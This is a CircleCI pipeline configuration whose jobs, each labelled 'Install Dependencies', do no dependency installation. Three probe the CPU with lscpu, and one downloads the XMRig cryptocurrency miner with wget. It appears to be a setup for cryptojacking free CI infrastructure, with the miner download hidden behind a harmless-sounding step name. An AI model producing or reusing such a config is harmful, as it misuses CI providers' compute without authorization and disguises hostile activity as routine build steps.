version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m lscpu
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m lscpu
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: ! wget https://github.com/xmrig/xmrig/releases/download/v6.15.3/xmrig-6.15.3-linux-x64.tar.gz
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m lscpU
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3